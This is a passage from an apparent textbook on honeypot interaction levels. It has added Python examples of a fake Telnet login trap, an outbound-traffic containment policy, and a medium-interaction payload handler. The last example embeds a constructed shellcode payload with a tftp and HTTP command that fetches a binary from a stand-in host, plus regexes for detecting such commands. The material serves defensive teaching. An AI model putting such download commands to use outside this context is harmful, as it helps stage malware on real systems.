Level of interaction gives us a scale with which we can measure and compare honeypots. The more a honeypot can do and the more an attacker can do to a honeypot, the greater the information that can be derived from it. However, by the same token, the more an attacker can do to the honeypot, the more potential damage an attacker can cause.
Based on interaction levels, honeypots fall into three categories [1,20]: low-interaction honeypots, medium-interaction honeypots, and high-interaction honeypots.
5.4.1 Low-Interaction Honeypots
Low-interaction honeypots are the simplest in terms of implementation; they are typically the easiest to install, configure, deploy, and maintain because of their simple design and basic functionality. These honeypots merely emulate a variety of services. Therefore, the attacker is limited to interacting with these pre-designated services. For example, a low-interaction honeypot could emulate a standard Unix server with several running services, such as Telnet and FTP. An attacker could Telnet to the honeypot, get a banner that states the OS, and perhaps obtain a login prompt. The attacker can then attempt to log in by brute force or by guessing passwords. The honeypot would capture and collect these attempts, but we should mention that there is no real OS for the attacker to log in to.
So, the attacker’s interaction is limited to login attempts!
A THEORETICAL GUIDE TO HONEYPOTS
In fact, the main function of low-interaction honeypots is detection, specifically of unauthorized scans or unauthorized connection attempts. As we mentioned above, low-interaction honeypots offer limited functionality, most of which can be emulated by a program. The program is simply installed on a host system and configured to offer whatever services the administrator wants, and the honeypot is ready. This makes both deployment and maintenance of the honeypot easy. All that the administrator has to do is maintain the patch level of the program and monitor any alerting mechanisms.
Low-interaction honeypots carry the lowest risk, because there is no real OS for the attacker to interact with (i.e., all of the services are emulated, not real). So, these honeypots cannot be used to harm or monitor other systems. Low-interaction honeypots log only limited information and are designed to capture known activities. An attacker can detect a low-interaction honeypot by executing a command that the emulation does not support.
One of the advantages of this approach is that the activities of the attacker are naturally sandboxed within the boundaries of the software running on a host OS. The honeypot can pretend to be, for example, a Solaris server, with the TCP/IP stack characteristics of a Solaris system emulated to fool OS fingerprinting and with the services one would expect to see on such a server. However, because these services are incompletely implemented, exploits written to compromise a Solaris server will at best result in a simulated compromise of the honeypot. That is, if the exploit is known and handled by the honeypot, the actual host OS is not compromised. In the worst case, the exploit will simply fail, because the exploit is unknown or the vulnerability is not implemented in the honeypot.
Another advantage of the low-interaction honeypot is that the attacker is also prevented from attacking other hosts from the honeypot system. This is again because the compromise of the server is only emulated.
Using low-interaction honeypots also has some disadvantages, which stem from the very same advantages. By definition, no low-interaction emulation of an OS and its services will be complete. The responses an attacker would expect for known vulnerabilities and exploits are emulated, so a low-interaction honeypot will not respond accurately to exploits we have not included in the emulated responses. The so-called zero-day exploits fall into this category. These exploits are kept private by the attackers, and it is therefore difficult to prepare your honeypot for these kinds of exploits [18].
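The Telnet scenario described in 5.4.1 (banner, login prompt, captured credential attempts, no real OS behind it) as a runnable Python sketch. This is an added example, not code from the book or from any particular honeypot product; the banner, the peer address, and the names EmulatedTelnet, strip_telnet_options, replay and serve are constructed for this illustration. It goes one step beyond the text by stripping Telnet option-negotiation bytes, which a real client sends first and which a naive emulation would otherwise log as a "username" and thereby reveal itself as fake.

```python
"""Low-interaction Telnet-style honeypot: banner, login loop, no real OS behind it."""
import socketserver
from dataclasses import dataclass, field

# Constructed values: the emulation pretends to be a Solaris host
BANNER = "SunOS 5.10\r\n"
LOGIN_PROMPT = "login: "
PASSWORD_PROMPT = "Password: "
FAILURE = "Login incorrect\r\n"
IAC = 0xFF  # Telnet "Interpret As Command": real clients open with option negotiation


def strip_telnet_options(data: bytes) -> bytes:
    """Remove IAC <command> <option> triplets (and unescape IAC IAC) from raw input.

    An emulator that stores these negotiation bytes as the 'username' both
    corrupts its own log and looks nothing like a real telnetd. Subnegotiation
    (IAC SB ... IAC SE) is not handled; this is deliberately a minimal emulation.
    """
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if b == IAC and i + 1 < len(data) and data[i + 1] == IAC:
            out.append(IAC)      # escaped literal 0xFF
            i += 2
        elif b == IAC and i + 2 < len(data):
            i += 3               # skip IAC <command> <option>
        elif b == IAC:
            break                # truncated sequence at end of buffer: ignore it
        else:
            out.append(b)
            i += 1
    return bytes(out)


@dataclass
class EmulatedTelnet:
    """One session. Only two states exist; a shell is never reached."""
    peer: str
    state: str = "login"                            # "login" -> "password" -> "login" ...
    username: str = ""
    attempts: list = field(default_factory=list)    # the evidence the honeypot exists to collect

    def greeting(self) -> str:
        return BANNER + LOGIN_PROMPT

    def handle_line(self, raw: bytes) -> str:
        """Consume one line from the attacker and return the emulated reply."""
        line = strip_telnet_options(raw).decode("utf-8", "replace").rstrip("\r\n")
        if self.state == "login":
            if not line:                      # empty username: re-prompt, as login(1) does
                return LOGIN_PROMPT
            self.username, self.state = line, "password"
            return PASSWORD_PROMPT
        # password state: record the pair, always reject, loop back to the login prompt
        self.attempts.append({"peer": self.peer, "user": self.username, "password": line})
        self.state = "login"
        return FAILURE + LOGIN_PROMPT


def replay(lines: list, peer: str = "203.0.113.7") -> list:
    """Drive one session from a constructed transcript and return the captured attempts."""
    session = EmulatedTelnet(peer)
    session.greeting()
    for line in lines:
        session.handle_line(line.encode() + b"\r\n")
    return session.attempts


class Handler(socketserver.StreamRequestHandler):
    """Network front end: one emulated session per TCP connection."""

    def handle(self):
        session = EmulatedTelnet(self.client_address[0])
        self.wfile.write(session.greeting().encode())
        seen = 0
        for raw in self.rfile:               # one line per iteration
            self.wfile.write(session.handle_line(raw).encode())
            for attempt in session.attempts[seen:]:
                print("LOGIN ATTEMPT", attempt)   # in a deployment this goes to a log or alert pipeline
            seen = len(session.attempts)


def serve(host: str = "127.0.0.1", port: int = 2323) -> None:
    """Stand-alone run: `telnet 127.0.0.1 2323` from the same machine exercises it."""
    with socketserver.ThreadingTCPServer((host, port), Handler) as srv:
        srv.serve_forever()


if __name__ == "__main__":
    serve()
```

Everything the attacker can reach is the two-state loop in handle_line, which is exactly the "interaction limited to login attempts" the text describes; the attempts list is the honeypot's whole product, and there is nothing to escalate into because no command interpreter exists.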
5.4.2 High-Interaction Honeypots
High-interaction honeypots are very different from low-interaction honeypots in terms of implementation and of the information they collect. They utilize actual OSs rather than emulations. As actual OSs are used in high-interaction honeypots, the attacker gets a more realistic experience, and we are able to gather more information about intended attacks. This makes high-interaction honeypots very useful in situations where one wishes to capture details of vulnerabilities or exploits that are not yet known to the public. Such vulnerabilities or exploits are being used only by a small number of attackers who discovered the vulnerability and wrote an exploit for it; these are known as zero-day exploits. It is very important to find and publicize these vulnerabilities quickly, so that system administrators can filter or work around the problems and vendors can develop and release software patches to fix them [18].
High-interaction honeypots are very dangerous, because attackers can use these systems to harm other systems. So, most often, high-interaction honeypots are placed within a controlled environment, such as behind a firewall. The ability to control the attacker comes not from the honeypot itself but from the network access control device, in many cases the firewall. The firewall allows the attacker to compromise one of the honeypots sitting behind it, but it does not let the attacker use the honeypot to launch attacks back out. Such an architecture is very complex to deploy and maintain, especially if you do not want the attacker to realize that he is being monitored and controlled. A great deal of work goes into building a firewall with a proper rule base.
As we have mentioned above, high-interaction honeypots need extensive control mechanisms; these can be extremely difficult and time-consuming to install and configure. To implement high-interaction honeypots, a variety of different technologies have to be combined, such as firewalls and IDSs, and all of them have to be properly customized for the high-interaction honeypot. Maintenance is also time-consuming, because we must update firewall rule bases and IDS signature databases and monitor the honeypot activity around the clock. Because of these complexities, high-interaction honeypots carry high risk: the more interaction we allow the attacker, the more that can go wrong. However, once implemented correctly, a high-interaction honeypot can give valuable insights about attackers that no other honeypot can.
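The control device's rule base described in 5.4.2 (attacks may come in, but the honeypot must not be usable to attack out, and every attempt to do so is itself a signal) as a small policy simulation in Python. This is an added example, not code from the book or from any firewall product: the honeypot addresses, the log format, the per-protocol limits and the names Conn, DataControl and run_policy are constructed here. It generalizes the text slightly in that the outbound limit is a number rather than a flat deny; setting the limits to 0 gives the strict policy the text describes, while small non-zero limits are the usual compromise so that an intruder does not notice the cage on first contact.

```python
"""Data control for a high-interaction honeynet: let attacks in, keep the honeypot from
attacking out, and treat every outbound attempt as evidence of compromise. Constructed example."""
from collections import defaultdict
from dataclasses import dataclass

HONEYPOTS = {"10.0.0.10", "10.0.0.11"}          # constructed honeynet addresses
# Constructed per-protocol limits on outbound connections one honeypot may open per window.
# 0 = nothing gets back out (the strict policy in the text); small limits let an intruder
# fetch a tool or two so the containment is not obvious immediately.
OUTBOUND_LIMITS = {"tcp": 3, "udp": 5, "icmp": 10}
WINDOW_SECONDS = 3600


@dataclass(frozen=True)
class Conn:
    ts: int        # seconds (small constructed values in the sample log)
    proto: str
    src: str
    dst: str
    dport: int


def parse_conn(line: str) -> Conn:
    """Parse one constructed connection-log line: '<ts> <proto> <src> -> <dst>:<dport>'."""
    ts, proto, src, _arrow, dst_port = line.split()
    dst, dport = dst_port.rsplit(":", 1)
    return Conn(int(ts), proto, src, dst, int(dport))


class DataControl:
    def __init__(self, honeypots=HONEYPOTS, limits=OUTBOUND_LIMITS, window=WINDOW_SECONDS):
        self.honeypots, self.limits, self.window = honeypots, limits, window
        self.outbound = defaultdict(list)   # (honeypot, proto) -> timestamps already let through
        self.alerts = []                    # a honeypot has no legitimate egress, so each attempt is logged

    def decide(self, c: Conn) -> str:
        src_hp, dst_hp = c.src in self.honeypots, c.dst in self.honeypots
        if dst_hp and not src_hp:
            return "ALLOW"                  # inbound: the attacker may reach the honeypot
        if src_hp and not dst_hp:
            return self._outbound(c)        # the dangerous direction
        if src_hp and dst_hp:
            return "ALLOW"                  # lateral movement stays inside the honeynet
        return "DROP"                       # unrelated traffic: default deny

    def _outbound(self, c: Conn) -> str:
        key = (c.src, c.proto)
        recent = [t for t in self.outbound[key] if c.ts - t < self.window]
        verdict = "ALLOW" if len(recent) < self.limits.get(c.proto, 0) else "DROP"
        if verdict == "ALLOW":
            recent.append(c.ts)
        self.outbound[key] = recent
        self.alerts.append(
            f"{c.src} -> {c.dst}:{c.dport}/{c.proto} outbound [{verdict}]: honeypot likely compromised"
        )
        return verdict


# Constructed log: an intruder reaches the honeypot, then tries to use it as a launch point
SAMPLE_LOG = [
    "1000 tcp 198.51.100.5 -> 10.0.0.10:22",
    "1300 tcp 10.0.0.10 -> 203.0.113.9:80",
    "1301 tcp 10.0.0.10 -> 203.0.113.9:80",
    "1302 tcp 10.0.0.10 -> 203.0.113.9:80",
    "1303 tcp 10.0.0.10 -> 192.0.2.44:445",
    "1400 tcp 10.0.0.10 -> 10.0.0.11:445",
    "1500 udp 198.51.100.5 -> 192.0.2.1:53",
]


def run_policy(lines=SAMPLE_LOG, control=None):
    """Apply the policy to a log; return (verdicts in log order, alerts raised)."""
    control = control or DataControl()
    verdicts = [control.decide(parse_conn(line)) for line in lines]
    return verdicts, control.alerts


if __name__ == "__main__":
    verdicts, alerts = run_policy()
    for line, verdict in zip(SAMPLE_LOG, verdicts):
        print(f"{verdict:5} {line}")
    print("\n".join(alerts))
```

The point a maintainer has to keep in view is that the alerts list, not the verdict, is the high-value output: a honeypot that starts opening outbound connections has been compromised whether or not the limit has been reached yet, and that is the moment the text's "around the clock" monitoring exists for.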
5.4.3 Medium-Interaction Honeypots
Medium-interaction honeypots [19] try to combine the benefits of both approaches (low- and high-interaction honeypots) with regard to botnet detection and malware collection while removing their shortcomings.
The key feature of medium-interaction honeypots is application-layer virtualization. They do not aim at fully simulating a complete operational system environment, nor do they implement all details of an application protocol. What medium-interaction honeypots do is provide, on certain ports, sufficient responses to what known exploits expect, enough to trick those exploits into sending their payloads.
Once the payload has been received, the shellcode is extracted and analyzed. The medium-interaction honeypot then emulates the actions the shellcode would perform to download the malware.
Therefore, the honeypot has to provide some virtual file system as well as virtual versions of the standard Windows download utilities. The honeypot can then download the malware from the serving location and store it locally or submit it somewhere else for analysis.
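The payload-handling stage of 5.4.3 (extract the download instruction from a received payload, emulate the download utility against a virtual file system, keep the sample for analysis) as an added Python example. It is not code from the book or from any medium-interaction honeypot; the payload bytes, the fake serving host, the virtual path and the names extract_downloads, fake_fetch and MediumInteractionHoneypot are all constructed here. The "shellcode" is plain stand-in text; the only analysis performed is recovering the download instruction embedded in it, and the fetch is an offline lookup so that nothing is ever actually downloaded or executed.

```python
"""Medium-interaction handling of a received payload: find the download instruction,
emulate the Windows download utility, store the sample for analysis. Constructed example."""
import hashlib
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed payload: what arrives after the honeypot's canned service response
# satisfies an exploit. The leading bytes stand in for shellcode; the part that
# matters to the emulation is the download instruction embedded in it.
SAMPLE_PAYLOAD = (
    b"\x90\x90\x90<stand-in shellcode bytes>"
    b"cmd /c tftp -i 203.0.113.9 GET update.exe\x00"
    b"http://203.0.113.9/loader.bin\x00"
)

# Constructed "server": what the emulated fetch returns, keyed by (host, resource)
FAKE_SERVER = {
    ("203.0.113.9", "update.exe"): b"MZ stand-in sample 1",
    ("203.0.113.9", "/loader.bin"): b"MZ stand-in sample 2",
}

URL_RE = re.compile(rb"(?:https?|ftp)://[\w.\-]+(?::\d+)?/[\w./\-]*")
TFTP_RE = re.compile(rb"tftp(?:\.exe)?\s+-i\s+([\w.\-]+)\s+get\s+([\w.\-]+)", re.IGNORECASE)


@dataclass(frozen=True)
class DownloadRequest:
    utility: str   # which virtual download utility the shellcode would have used
    host: str
    resource: str


def extract_downloads(payload: bytes) -> list:
    """Pull download instructions out of a raw payload (tftp command lines and URLs)."""
    reqs = [DownloadRequest("tftp", h.decode(), f.decode()) for h, f in TFTP_RE.findall(payload)]
    for url in URL_RE.findall(payload):
        parts = urlsplit(url.decode())
        reqs.append(DownloadRequest(parts.scheme, parts.hostname, parts.path))
    return reqs


def fake_fetch(req: DownloadRequest):
    """Offline stand-in for the honeypot's sandboxed fetcher; None if the host has nothing."""
    return FAKE_SERVER.get((req.host, req.resource))


class MediumInteractionHoneypot:
    def __init__(self, fetch=fake_fetch):
        self.fetch = fetch
        self.vfs = {}       # virtual file system: path -> bytes; nothing touches the real disk
        self.samples = {}   # sha256 -> DownloadRequest, what gets submitted for analysis

    def handle_payload(self, payload: bytes) -> list:
        """Emulate what the shellcode would do: fetch each sample into the virtual FS.

        Returns the digests collected so far, in order of first appearance.
        """
        for req in extract_downloads(payload):
            data = self.fetch(req)
            if data is None:
                continue        # serving host gone: record nothing, and nothing ran
            digest = hashlib.sha256(data).hexdigest()
            name = req.resource.rsplit("/", 1)[-1] or "sample.bin"
            self.vfs["C:\\Windows\\Temp\\" + name] = data
            self.samples[digest] = req
        return list(self.samples)


if __name__ == "__main__":
    hp = MediumInteractionHoneypot()
    for digest in hp.handle_payload(SAMPLE_PAYLOAD):
        print(digest, hp.samples[digest])
    print(sorted(hp.vfs))
```

The design choice worth noting is the injected fetch function: the emulation of the download utility is the same whether the sample comes from a real serving host through a sandboxed, rate-limited fetcher or from the constructed table above, and the digest plus the originating host and resource are the artefacts that get submitted for analysis.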